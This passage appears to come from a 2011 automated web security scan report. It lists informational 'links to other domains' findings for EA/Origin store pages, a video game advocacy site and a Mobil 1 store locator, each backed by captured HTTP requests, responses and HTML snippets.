<a href="http://store.origin.com/store/ea/en_US/pd/productID.225126100?easid=Origin-AliceMadnessReturns_Web_Herobanner_PreOrder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/70846_690x330_buynow.jpg" alt="Alice: Madness Returns(TM)" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/en_US/pd/productID.225126100?easid=Origin-AliceMadnessReturns_Web_Herobanner_PreOrder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.225126100" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.225126100');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="http://store.origin.com/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_PreOrder_Web_Herobanner_PreOrder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/71072_690x330_e3.jpg" alt="The Sims... 3 Pets Limited Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_PreOrder_Web_Herobanner_PreOrder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.229351900" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.229351900');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="http://store.origin.com/store/ea/html/pbPage.battlefield3_US_LE?easid=Origin-Battlefield3_Play4Free_Web_herobanner_Preorder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/71067_690x330_LE_Play4Free_EN.jpg" alt="Battlefield 3... Limited Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/html/pbPage.battlefield3_US_LE?easid=Origin-Battlefield3_Play4Free_Web_herobanner_Preorder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.224766400" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.224766400');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.208594200"><img border="0" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/09893_LB_135.jpg" alt="Shadows of the Damned..." /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.208594200" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
<a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US/buy/ThemeID.718200/productID.208594200" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.219720800"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71017_LB_135.jpg" alt="The Sims... 3 Generations" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.219720800" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.222885600"><img border="0" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71073_LB_135nr_e3.jpg" alt="Mass Effect 3" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.222885600" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.222885600" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.222885600');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.228918300"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71064_Special_LB_135.jpg" alt="The Sims Medieval(TM) Special Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.228918300" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.228918300" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.228918300');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="http://www.origin.com/about?easid=Origin-Origin_Web_HPRnav_Download"><img id="Origin" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/OriginApp_216x396.jpg" /></a>
...[SNIP]...
<a href="/store/ea/search/?keywords=amr&easid=Origin-AliceMadnessReturns_Web_Right_BuyNow
" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/71081_220x220.jpg" border="0" alt="Alice: Madness Returns(TM)" /></a>
...[SNIP]...
<a href="/store/ea/en_US/html/pbPage.reckoning_US?easid=Origin-AmalurReckoning_Web_Right_PreOrder" target="_blank">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/reckoning-220x220.jpg" border="0" alt="Kingdoms of Amalur: Reckoning..." /></a>
...[SNIP]...
<a href="/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_Web_Right_PreOrder" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/Sims3Pets_220x220.jpg" border="0" alt="The Sims... 3 Pets Limited Edition" /></a>
...[SNIP]...
<a href="http://www.origin.com/e3?easid=Origin-E3Trailers_Web_Right_LandingPage" target="_blank">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/exclusivetrailers_220x286.jpg" border="0" alt="Merchandising - DO NOT RETIRE" /></a>
...[SNIP]...
<a href="/store/ea/en_US/html/pbPage.me3_US?easid=Origin-MassEffect3_Web_Right_PreOrder" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/me3_220x220_1.jpg" border="0" alt="Mass Effect... 3 N7 Digital Deluxe Edition" /></a>
...[SNIP]...
<a href="/store/ea/html/pbPage.fs2011_01" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/FreeShipping_220x175_1.jpg" border="0" alt="MerchandisingProduct2" /></a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/racing-games">Racing</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/shooting-games">Shooting</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/puzzle-games">Puzzle</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/rpg-games">RPG</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/kids-games">Kids</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/strategy-games">Strategy</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/simulation-games">Simulation</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/sports-games">Sports</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/legalnotice.jsp">Legal Notices</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC/">Terms of Service</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<dd><a href="http://www.info.ea.com/">Corporate Info</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/termsofsale/US/enl/PC/">EA Terms of Sale</a>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99017372" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99028820" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...
18.28. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=226783800&option=3 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D; s_cc=true

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64735090744,0)
Date: Fri, 24 Jun 2011 14:35:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 1305


<!-- REQUEST ID: TIME=1308926150161:NODE=c2a5301:THREAD=1741 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...
a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US/AddItemToRequisition/ThemeID.718200&productID=226783800" onclick="parent.loadIframeIcon(true); parent.closeIframe();" target="_parent"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/add_to_cart_en_US.gif" alt="add to cart" /></a>
...[SNIP]...
18.29. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=120569681122,0)
Date: Fri, 24 Jun 2011 14:36:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926165255:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/esi?SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=meta.html"-->
<link type="text/css" rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/games/ea-com_all_v2-9.css" />
<!--[if IE 7]>
...[SNIP]...
<![endif]-->
<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<meta name="google-site-verification" content="CBfSIthiQRhv5lYo6sCn30bvIcodSEX0WTtWfW3jfZE" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<a href="/DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/continue_shoppingv7.png" /></a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/racing-games">Racing</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/shooting-games">Shooting</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/puzzle-games">Puzzle</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/rpg-games">RPG</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/kids-games">Kids</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/strategy-games">Strategy</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/simulation-games">Simulation</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/sports-games">Sports</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/legalnotice.jsp">Legal Notices</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC/">Terms of Service</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<dd><a href="http://www.info.ea.com/">Corporate Info</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/termsofsale/US/enl/PC/">EA Terms of Sale</a>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99017372" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...
18.30. http://videogamevoters.org/eacorp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /eacorp/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /eacorp/?topicId=11341 HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-CheckNode=

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 24 Jun 2011 13:43:43 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 14466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<title>V
...[SNIP]...
Game Voters Network as they stick up for video gamers' rights. We must make it clear that gamers will continue to stand up for free speech -- and that the numbers are on our side.">


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</param>
<embed src="http://www.youtube.com/v/HLsOilplBxk&hl=en&fs=1&" wmode="transparent" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="319" height="207"></embed>
...[SNIP]...
<map name="Social" id="Social">
                    <area shape="rect" coords="30,48,112,79" href="http://www.facebook.com/videogamevoters" alt="Facebook" />
                    <area shape="rect" coords="133,47,250,78" href="http://www.myspace.com/vgvn" alt="Myspace" target="_blank" />
                    <area shape="rect" coords="3,105,67,133" href="http://www.youtube.com/watch?v=wy3hhyQfsKs" alt="YouTube" target="_blank" />
                    <area shape="rect" coords="96,103,171,129" href="http://www.flickr.com/groups/wallofprotest" alt="Flickr" target="_blank" />
                    <area shape="rect" coords="190,104,270,130" href="http://twitter.com/VideoGameVoters" alt="Twitter" target="_blank" />
                   </map>
...[SNIP]...
<p>&copy; Video Game Voters 2009 - 2011 / <a href="http://www.theesa.com/privacy/index.asp" target="_blank">See our updated Privacy Policy</a>
...[SNIP]...
<div id="esrb-cert"><a href="http://www.theesa.com/privacy/index.asp" target="_blank"><img src="/page/-/images/esrb-privacy-certified-2008-117x44.gif" width="117" height="44" alt="ESRB Certified" />
...[SNIP]...
18.31. http://web-static.ea.com/atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js?v=1308169381 HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 15 Jun 2011 20:23:18 GMT
ETag: "69058b-5e8b5-4a5c5ec53e83c"
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Type: application/javascript
Content-Length: 387253
Cache-Control: max-age=32555
Expires: Fri, 24 Jun 2011 22:48:43 GMT
Date: Fri, 24 Jun 2011 13:46:08 GMT
Connection: close

(function(window,undefined){var document=window.document,jQuery=(function(){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context,rootjQuery)},_jQuery=window.jQuery,_$=windo
...[SNIP]...
<p>This content requires the Flash Player '+ver+' or above. <a href="http://www.adobe.com/go/getflashplayer" target="_blank">Download Flash Player</a>
...[SNIP]...
18.32. http://web.sa.mapquest.com/mobil1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /mobil1/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mobil1/?tempset=search HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/lubricants.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:46 GMT
Server: AOLserver/4.0.10
Content-Type: text/html; charset=iso-8859-1
ntCoent-Length: 39953
Connection: close
Content-Length: 39953


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="description" content="Find Mobil 1 Motor Oil at a Store or Installer" />
   <LINK href="
...[SNIP]...
<td><a href="http://www.mobiloil.com/USA-English/MotorOil/Home/Homepage.aspx"><img alt="" src="http://www.mobiloil.com/USA-English/MotorOil/Images/logo_mobil.gif" border="0" height="40" width="120"></a></td><td width="30"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" border="0" height="40" width="20"></td><td width="300"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" border="0"></td><td class="blueLink" align="center" width="150"><a href="http://www.mobil1racing.com/" target="_new"><b class="blueLink">
...[SNIP]...
<td class="mobiltdNav" align="center" valign="middle" width="58"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Oils.aspx">Oils</a></td><td align="center" valign="middle" width="142"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Other_Products/Other_Products.aspx">Other Products</a>
...[SNIP]...
<td align="center" valign="middle" width="148"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Synthetics/Mobil_1_Circle_of_Performance.aspx">Why Synthetics?</a>
...[SNIP]...
<td align="center" valign="middle" width="148"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/factory_fill/Mobil_1_Factory_fill_home.aspx">Factory Fill</a>
...[SNIP]...
<td align="center" valign="middle" width="80"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Car_Care/Car_Care_Home.aspx">Car Care</a></td><td align="center" valign="middle" width="80"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Videos/TV.aspx">Videos</a></td><td align="center" valign="middle" width="120"><a class="navItem" href="http://www.mobiloil.com/USA-English/MotorOil/Promotions/Promotions.aspx">Promotions</a></td><td align="center" valign="middle" width="19"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" border="0" height="25" width="19"></td>
...[SNIP]...
<td align="left" valign="top"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/Banners/2006_Banner_Oil_Section.jpg" alt="World's Leading Synthetic Motor Oil Brand" height="64" width="750"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" border="0" height="1" width="1"></td>
...[SNIP]...
<td align="centre" width="200"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/whatstherightoil.gif" alt="Right Oil for My Car" border="0"></td>
...[SNIP]...
<a href="http://web.sa.mapquest.com/mobil1/?tempset=search"><img alt="Retail Locator" src="http://www.mobiloil.com/USA-English/MotorOil/Images/retail_locator.gif" border="0"></a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Oils.aspx" class="lnavItem">OILS</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td><td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Mobil_1_Extended_Performance.aspx" class="lnavItem">MOBIL 1 EXTENDED PERFORMANCE</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="180"></td>
...[SNIP]...
<td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="7"></td><td valign="top"><img src="http://www.mobiloil.com/images/lnav_arrow.gif" alt="" border="0" height="14" width="6"></td><td><img src="http://www.mobiloil.com/USA-English/MotorOil/Images/spacer.gif" alt="" height="1" width="5"></td>
<td valign="top" width="154"><a href="http://www.mobiloil.com/USA-English/MotorOil/Oils/Mobil_1.aspx" class="lnavItem">MOBIL 1</a>
...[SNIP]...
